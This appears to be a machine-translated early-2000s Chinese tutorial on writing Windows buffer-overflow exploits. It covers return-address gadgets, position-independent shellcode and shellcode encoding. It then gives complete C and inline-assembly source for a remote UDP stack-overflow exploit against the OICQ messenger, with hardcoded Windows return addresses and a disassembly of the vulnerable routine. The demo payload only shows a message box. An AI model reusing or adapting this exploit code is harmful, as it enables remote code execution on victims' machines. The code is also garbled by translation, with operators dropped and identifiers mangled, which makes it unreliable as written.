Writing skills under Windows
Author: Yuan brother
Mail: yuan@163.net
I saw some windows's overflow programs, I didn't have a unity, perfect, and decided to be a relatively unified write method, trying to solve some problems.
1, JMP ESP problem.
In order to unify, KernerL32 is used. DLL code because at least the same system Kernel32. The DLL module load address may be small,
Other modules may differ from different load addresses with the installation application software, and its module installation is Kernel32. DLL is in front, behind
The module installation address changes with the changes in the front module, so it is still decided to use kernel32. DLL is relatively unified (that is, different versions of the same system
). Solved the JMP ESP (FF E4) code can't find a problem, increase the use
PUSH ESP (54)
. . . .
Ret (C3)
or
PUSH ESP (54)
. . . .
RET 00XX (C2 XX 00) (Ret Num, NUM is best not too big, so doing limit num = 00xx)
Code, this can be found. "..." is a few non-statements, but it does not affect the function.
For example, find a code to use:
PUSH ESP
And Al, 08
Ret 10
Select the principle try to use the modules in front of the module because the same may be large in front of the different versions.
Because the 9X and NT system module load addresses are very different, it is impossible to unify this method, I saw Winnt, win2000 actually
Kernel32. The loading address of the DLL is different, it is a bit. . . . Which program of the specific program can try to find JMP ESP in that program.
But this address is usually 0x00xxxxxx, so there is a problem. Can this identify the system to attack the system in the program? The following program is
Using macro.
2. Solve the writing of shellcode.
It turned out that many procedures shellcode was written in the form of "/ xaa / XBB" first, one is not good, and it is not good.
What is shellcode. So the idea is written together with the shellcode and overflow. This is a bit a little requirement for shellcode writing.
It is required that the shellcode code is a movable code, which is the entire code address moves as usual. In order to reduce the incompatibility, the function calls the address is also used.
LoadLibrary and getProcadDress get, so shellcode relies only to these two parameters. In fact, these two parameters can also be in memory
Found in Kernel32. DLL module, then generate the table you get the address according to the function. That just have JMP ESP addresses in WinNT, Win200, Win9x
There is no uniform under.
The prototype written in the program has been roughly written. There are a few questions now:
First, determine the shellcode function code address, directly specifying the address of a JMP shellcode, should have a method directly.
Second, shellcode often has a call to _chkesp, which can be used to control the compilation or find the call _chkesp
The code is filled with NOP.
3, shellcode characters often have requirements, decide to encode the shellcode, add a small piece of code to Shellcode, encoding as the requirements
Shellcode, which reduces the requirements written for Shellcode. Different requirements mainly rewrite this small encoding code. / * OICQ 199B Build 0220 Overflow Program
Copy by yuan
The new version 0410 has a stack overflow, using this program to attack, but can not perform SELLCODE
* /
#include
#include
#include
#define nukewin2000
// # Define nukewin9x
#ifdef nukewin2000
#define reteipaddr eipwin2000
#define loadlibraryfnaddress 0x77e78023 // 0x77e60000 0x00018023 LoadLibrary
#define getprocaddressfnaddress 0x77e7564b // 0x77e60000 0x0001564b getProcAddress
#ELSE
#ifdef nukewin9x
#define reteipaddr EIPWIN9X
#define loadLibraryFnaddress 0xBff77750 // 0xBFF70000 0x00007750 LoadLibrary
#define getProcaddressFnaddress 0xBff76e28 // 0xBFF70000 0x00006E28 getProcAddress
#ELSE
#define reteipaddr EIPWINNT
#define loadLibraryFnaddress 0x77ee391a // 0x77ed0000 0x0001391a loadLibrary
#define getprocaddressfnaddress 0x77ee4111 // 0x77ed0000 0x00014111 GetProcAddress
#ENDIF
#ENDIF
#define nopcode 0x90
#define buffsize 0x2000
#define oicqport 4000
#define OICQOVERADD 7 0x41C
#define Overadd OICQOVERADD
#define str0 0
#define str1 11
#define str2 23
#define STR3 33
#define str4 39
#define STR5 51
Void shellcodefnlock ();
Void shellcodefn ();
Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkespadd, Int Len)
INT main (int Argc, char ** argv)
{
Char * server;
Char * str = "user32.dll" "/ x0" "messageboxa" "/ x0" "/ x0" "OK!" "/ x0" "msvcrtd.dll" "/ x0" "exit" "/ x0 "
Char buff1 [] = "/ x02 / x01 / x07 / x33 / x33 / x33 / x33 / x33 / x1f / x30 / x1f / x37 / x35 / x1f" 2000-4-10 " "/ x1f" "12:00:00" "/ x1f"; / * OICQ UDP Head * /
// 0x77ed0000 0x1ddd4 kernel32.dll // push ESP // and al, 08 // RET 0C
Char Eipwinnt [] = "/ xd4 / xdd / xee / x77"; // 0x77ed0000 0x0001DDD4
Char Eipwin2000 [] = "/ xea / x17 / xe8 / x77"; // 0x77e60000 0x000217EA
// kernel32.dll // push esp // and al, 08 // RET 0C
// 0x77e2e32a user32.dll JMP ESP
Char Eip2win2000 [] = "/ x2a / xe3 / xe2 / x77"; // 0x77df0000 0x0003E32A
Char Eipwin9x [] = "/ xd9 / x6a / xf7 / xbf"; // 0xBFF70000 0x00006AD9
// kernel32.dll 4.10.2184 0xBFF70000 0x0006AD9
// push ESP // and Al, 0x10; // RET 0x10;
CHAR BUFF [Buffsize];
Char shellcodebuff [0x1000];
Struct SockAddr_in S_IN2, S_IN3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong;
UNSIGNED INT I, J, K;
UNSIGNED CHAR TEMP;
Int fd;
U_SHORT Port, Port1;
Socket D_IP;
Wsadata wsadata;
Int result = WSAStartup (Makeword (1, 1), & WSADATA);
IF (Result! = 0) {
FPRINTF (stderr, "Your Computer Was Not Connected"
"To the Internet at the time That"
"this program was launched, or you"
"Do Not Have A 32-bit"
"Connection to the Internet.");
Exit (1);
}
IF (Argc <2)
{
WSACLEANUP ();
FPRINTF (stderr, "/ n nuke oicq ./n copy by yuan 2000.4.1. / n Wellcome to my homepage http://yuane.yeah.net.");
FPRINTF (stderr, "/ n usage:% s
Exit (1);
}
Else Server = argv [1];
D_IP = inet_addr (server); if (D_IP == - 1) {
He = gethostByname (Server);
IF (! HE)
{
WSACLEANUP ();
Printf ("/ n can't get the ip of% s! / n", server);
Exit (1);
}
Else Memcpy (& D_IP, HE-> H_ADDR, 4);
}
IF (Argc> 2) Port = ATOI (Argv [2]);
Else port = OICQPORT;
IF (port == 0) port = OICQPORT;
fd = socket (AF_INET, SOCK_DGRAM, 0);
i = 8000;
Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i));
S_IN2.SIN_FAMILY = AF_INET;
IF (Argc> 3) Port1 = ATOI (Argv [3]);
Else Port1 = OICQPORT;
IF (port1 == 0) port1 = oicqport;
S_IN2.SIN_PORT = HTONS (port1);
S_IN2.SIN_ADDR.S_ADDR = 0;
S_IN3.SIN_FAMILY = AF_INET;
S_IN3.SIN_PORT = HTONS (Port);
S_IN3.SIN_ADDR.S_ADDR = D_IP;
Bind (FD, (Const struct sockaddr far *) & s_in2, sizeof (struct sockaddr_in);
Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_PORT));
MEMSET (BUFF, NOPCODE, BUFFSIZE);
Memcpy (BUFF, BUFF1, 37);
_asm {
MOV ESI, ESP
CMP ESI, ESP
}
_chkesp ();
Chuestspadd = _chkesp;
Temp = * chuest;
IF (Temp == 0xE9) {
chuesthant
// (int *) i = (int *) * chuesthard;
_asm {
MOV EDI, DWORD PTR [ChuestsePadd]
Mov Edi, [EDI]
MOV I, EDI
}
Chkespadd = i;
Chkespadd = 4;
}
Shellcodefnadd = shellcodefnlock;
Temp = * shellcodefnadd;
IF (Temp == 0xE9) {
shellcodefnadd;
// (int *) k = (int *) * shellcodefnadd;
_asm {
MOV EDI, DWORD PTR [shellcodefnadd]
Mov Edi, [EDI]
MOV K, EDI
}
Shellcodefnadd = K;
Shellcodefnadd = 4;
}
For (k = 0; k <= 0x500; k) {
IF (Memcmp (Shellcodefnadd K, "/ X90 / X90 / X90 / X90", 4) == 0) Break;
}
Memcpy (buff OverAdd 0x20, Shellcodefnadd K 4, 8); shellcodefnadd = shellcodefn;
Temp = * shellcodefnadd;
IF (Temp == 0xE9) {
shellcodefnadd;
// (int *) k = * shellcodefnadd;
_asm {
MOV EDI, DWORD PTR [shellcodefnadd]
Mov Edi, [EDI]
MOV K, EDI
}
Shellcodefnadd = K;
Shellcodefnadd = 4;
}
For (k = 0; k <= 0x1000; k) {
IF (Memcmp (Shellcodefnadd K, "/ X90 / X90 / X90 / X90", 4) == 0) Break;
}
Memcpy (shellcodeBuff, shellcodefnadd, k); // j);
Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K);
Memcpy (ShellcodeBuff K, STR, 0x80);
SendPacketlong = K 0x80;
For (k = 0; k <= 0x200; k) {
IF (MemcMP (Buff Overadd 0x20 K, "/ X90 / X90 / X90 / X90", 4) == 0) Break;
}
For (i = 0; i Temp = shellcodebuff [i]; TEMP & = 0xF0; Temp = TEMP / 0X10; TEMP = 0x41; BUF [OVERADD 0x20 K] = TEMP; K; Temp = shellcodebuff [i]; TEMP & = 0x0f; TEMP = 0x41; BUF [OVERADD 0x20 K] = TEMP; K; } Memcpy (buff Overadd, ReteipAddr, 4); Sendpacketlong = Overadd 0x20 K 0x10; FOR (i = 0; i <1; i) { J = rand (); BUFF1 [0x5] = j; Buff1 [0x6] = J 1; J = sendpacketlong; BUF [J-1] = 0x03; FPRINTF (stderr, "/ n send packet% d bytes.", J); Sendto (FD, BUFF, J, 0, (Const struct sockaddr far *) & s_in3, sizeof (struct sockaddr_in); } CloseSocket (FD); WSACLEANUP (); Return (0); } Void shellcodefnlock () { _asm { NOP NOP NOP NOP JMP next GetIAdd: Pop Edi Push EDI POP ESI LOOPLOCK: LODSW SUB AX, 0x4141 SHL Al, 4 XOR Al, AH Stosb CMP AH, 0x10 JB Looplockjmp Shell Next: Call getEDiadd Shell: NOP NOP NOP NOP } } Void shellcodefn () { // const char str [] = "user32.dll" / x0 "" messageboxa "" / x0 "" msvcrtd.dll "" / x0 "" exit "; FarProc Procloadlib, ProcgetAdd, procmsg, procexit Char * stradd; Handle Libhandle; Procloadlib = loadingLibraryFnaddress; ProcgetAdd = getProcaddressFnaddress; _asm { JMP nextcall GetStradd: Pop Stradd } LibHandle = ProcloadLib (stradd str0); procmsg = procgetadd (libhandle, stradd str1); Procmsg (0, stradd str3, stradd str2, 0); // libhandle = proCloadLib (stradd str6); // OpenSocketAdd = ProcgetAdd (stradd str7); LibHandle = ProcloadLib (stradd str4); ProceXit = ProcgetAdd (Libhandle, Stradd Str5); ProceXit (0); _asm { DIE: JMP DIE NextCall: Call GetStradd NOP NOP NOP NOP } } Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (temp == 0xe8) { / / (Int *) k = * (shellbuff i 1); K = shellbuff i 1; _asm { Mov EDI, K Mov Edi, [EDI] MOV K, EDI } Calladd = fnadd; Calladd = K; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [i] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } } / * OICQ has problem code : 00425D51 837C240800 CMP DWORD PTR [ESP 08], 00000000 00425D56 740C JE 00425D64 : 00425D58 8B01 MOV EAX, DWORD PTR [ECX]: 00425D5A FF742408 PUSH [ESP 08] : 00425D5E FF90B8000000 Call DWORD PTR [EAX 000000B8] * Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS: |: 00425D56 (C) | : 00425D64 33C0 XOR EAX, EAX : 00425D66 C20800 RET 0008 : 00425D69 B8E4774900 MOV EAX, 004977E4 : 00425D6E E80D700300 CALL 0045CD80 : 00425D73 81ec10040000 Sub ESP, 00000410 Have overflow YRG 2000.04.18 Buffer size 00425D79 53 PUSH EBX 00425D7A 56 PUSH ESI : 00425D7B 8B7508 MOV ESI, DWORD PTR [EBP 08] : 00425D7E 8D85E4FBFFFF LEA EAX, DWORD PTR [EBP FFFFFBE4] 00425D84 57 Push EDI : 00425D85 50 Push Eax : 00425D86 FF7628 PUSH [ESI 28] : 00425D89 8BD9 MOV EBX, ECX : 00425D8B FF7624 PUSH [ESI 24] : 00425D8E E8C9000000 CALL 00425E5C : 00425D93 85C0 Test Eax, Eax : 00425D95 0F84B0000000 JE 00425E4B : 00425D9B 8D85E8FBFFFF LEA EAX, DWORD PTR [EBP FFFFFBE8] : 00425DA1 8D4DF0 LEA ECX, DWORD PTR [EBP-10] : 00425DA4 50 Push EAX : 00425DA5 E8CFF10400 CALL 00474F79 : 00425DAA 8365FC00 and DWORD PTR [EBP-04] 00000000 : 00425DAE 8bbde6fbffff Mov EDI, DWORD PTR [EBP FFFFFBE6] : 00425DB4 56 PUSH ESI : 00425DB5 8D4D08 LEA ECX, DWORD PTR [EBP 08] : 00425DB8 E8BCF10400 CALL 00474F79 : 00425DBD 0FB785E4FBFFF MOVZX EAX, Word PTR [EBP FFFFBE4]: 00425DC4 8B7620 MOV ESI, DWORD PTR [ESI 20] : 00425DC7 83E878 SUB EAX, 00000078 : 00425DCA C645FC01 MOV [EBP-04], 01 : 00425DCE 7434 JE 00425E04 00425DD0 48 DEC EAX : 00425DD1 7560 JNE 00425E33 : 00425DD3 51 Push ECX : 00425DD4 8D45F0 LEA Eax, DWORD PTR [EBP-10] : 00425DD7 8BCC MOV ECX, ESP : 00425DD9 8965EC MOV DWORD PTR [EBP-14], ESP : 00425DDC 50 Push EAX : 00425DDD E89EEE0400 CALL 00474C80 00425DE2 57 Push EDI : 00425DE3 56 Push ESI 00425DE4 51 PUSH ECX : 00425DE5 8D4508 LEA EAX, DWORD PTR [EBP 08] : 00425DE8 8BCC MOV ECX, ESP : 00425DEA 8965E8 MOV DWORD PTR [EBP-18], ESP : 00425DED 50 Push EAX : 00425DEE C645FC03 MOV [EBP-04], 03 : 00425DF2 E889EE0400 CALL 00474C80 : 00425DF7 8BCB MOV ECX, EBX : 00425DF9 C645FC01 MOV [EBP-04], 01 : 00425DFD E8D4030000 CALL 004261D6 : 00425E02 EB2F JMP 00425E33 * Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS: |: 00425DCE (c) | 00425E04 51 PUSH ECX : 00425E05 8D45F0 LEA Eax, DWORD PTR [EBP-10] : 00425E08 8BCC MOV ECX, ESP : 00425E0A 8965E8 MOV DWORD PTR [EBP-18], ESP 00425E0D 50 PUSH EAX : 00425E0E E86DEE0400 CALL 00474C80 00425E13 57 Push EDI: 00425E14 56 PUSH ESI : 00425E15 51 PUSH ECX : 00425E16 8D4508 LEA Eax, DWORD PTR [EBP 08] : 00425E19 8BCC MOV ECX, ESP : 00425E1B 8965EC MOV DWORD PTR [EBP-14], ESP : 00425E1E 50 Push EAX : 00425E1F C645FC02 MOV [EBP-04], 02 : 00425E23 E858EE0400 CALL 00474C80 : 00425E28 8BCB MOV ECX, EBX : 00425E2A C645FC01 MOV [EBP-04], 01 00425E2E E860040000 Call 00426293 * Reference by A (u) Nconditional OR (C) OONDitional Jump At Addresses: |: 00425DD1 (C),: 00425E02 (U) | : 00425E33 8065FC00 and Byte PTR [EBP-04], 00 : 00425E37 8D4D08 LEA ECX, DWORD PTR [EBP 08] 00425E3A E8CCF00400 CALL 00474F0B : 00425E3F 834DFCFF or DWORD PTR [EBP-04], fffffff : 00425E43 8D4DF0 LEA ECX, DWORD PTR [EBP-10] : 00425E46 E8C0F00400 CALL 00474F0B * Reference by A (u) Nconditional OR (C) ONDITIONAL JUMP AT ATDRESS: |: 00425D95 (C) | : 00425E4B 8B4DF4 MOV ECX, DWORD PTR [EBP-0C] : 00425E4E 5F POP EDI : 00425E4F 5E POP ESI : 00425E50 64890D00000000 MOV DWORD PTR fs: [00000000], ECX 00425E57 5B POP EBX 00425E58 C9 Leave : 00425E59 C20400 RET 0004 * / / * OICQ message UDP data structure, see Zer9's "OICQ security problem" Struct toicqptop { CHAR TAG1; // 0x02 // Obviously OICQ protocol number OR version, fixed CHAR TAG2; // 0x01 // Obviously OICQ's protocol number OR version, fixed CHAR TAG3; // 0x07 Char tag4; // 0x00 Char tag5; // 0x78 CHAR TAG6; // These two bytes are equivalent to process IDs on UNIX, char tag7; // can assign values. CHAR coICQNUB []; // The sender's OICQ number. EXP: 123456 CHAR CFF; // 0x1f In all OICQ information structure, the split is 0x1f CHAR Cr; // '0' fixed CHAR CFF; // CHAR CE []; // "75", this bit is relatively fixed, which may be an operational way. CHAR CFF; Char cdatetime []; // exp: "2000-4-10", 0x1f, "12:00:12", 0x1f CHAR OUTMSG []; // The message content sent. CHAR CEND; // 0x03, all OICQ information has been 0x03 to end. } * /
